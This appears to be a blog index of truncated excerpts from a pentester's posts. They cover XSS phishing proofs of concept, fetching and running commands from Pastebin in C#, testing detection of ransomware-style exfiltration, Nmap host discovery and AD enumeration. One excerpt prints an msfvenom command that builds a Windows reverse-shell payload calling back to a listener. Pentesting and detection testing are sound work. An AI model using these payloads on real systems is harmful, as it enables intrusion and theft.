The following loop may be used to find all files that are both executable and writable. To increase your chances of finding a file you may actually execute you can run the following loop after. It will try to add an alternative stream to every file identified and then execute it through cscript. Anything that executes will […]

If you find an XSS but there are no cookies to steal, maybe you could show a PoC that manipulates the content of the websites main page, which could be used in a phishing scenario. The following would alter the first 25 links on the webpage and point them to https://kennyjansson.com. Which could have displayed a fake […]

I recently completed the Offensive Security Web Expert (OSWE) exam, and I am here including two key takeaways with famous quotes that applies both in life and in the journey towards this certification. NB: to be clear I am not revealing anything regarding the exam here and the examples are random. Key takeaway number one“give me six […]

The below is a way to test whether detection mechanisms can detect malware or ransomware that exfiltrates data on mapped drives. You could put the below in a .bat file (be sure to add another % for each variable) or you could execute it in another way such as Pastebin command executor . To use the below […]

The following is a C# code example that can be used to fetch and run commands straight from pastebin. This could be an alternative way to simulate malware attacks, without putting the malicious code on disk. Of course you could put any URL here, but pastebin is a great site since many malware use this site for […]

Sometimes when doing Host Discovery with Nmap you would get a response that all hosts that you scanned are up. This could be because a firewall is responding instead of a host to some of the SYN’s your Host Discovery is sending. In addition, the firewall could be configured to reply on all most common ports, making […]

Some examples how to convert a script to be on one line (so that it may be passed as a payload etc.) VBS msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f vbs -o m.vbscat m.vbs | sed ‘:a;N;$!ba;s/_\n//g’ | tr -d ‘\t’ | tr ‘\n’ ‘:’ | sed ‘s/::/:/g’ | tr -d ‘\r’ | base64 […]

Finding hidden fileshares could be a tedious task, especially evaluating the content. One way is to automate this with powershell, but the functions may be privileged or you may have no access to powershell. Another way is to use net view inside some scripts. The sharefinder.cmd script below writes to a file of choice the contents of […]

Sometimes you may find a reflection, in which some characters (like =, space etc.) is not allowed). Lets say there is an xss at www.xyz.org/?s=<xss here>. But if you type <script src=”…”>, it does not reflect properly due to that equal character and space character. The example below shows how you may bypass the space character problem. […]

In a pentest, user information from Active Directory could reveal patterns and user behavior. For example, if a user last set his password in October 2007, chances are the password has something to do with October 2017. To know what users to target, group membership could be handy. Getting user group membership into a csv files requires some specific joining […]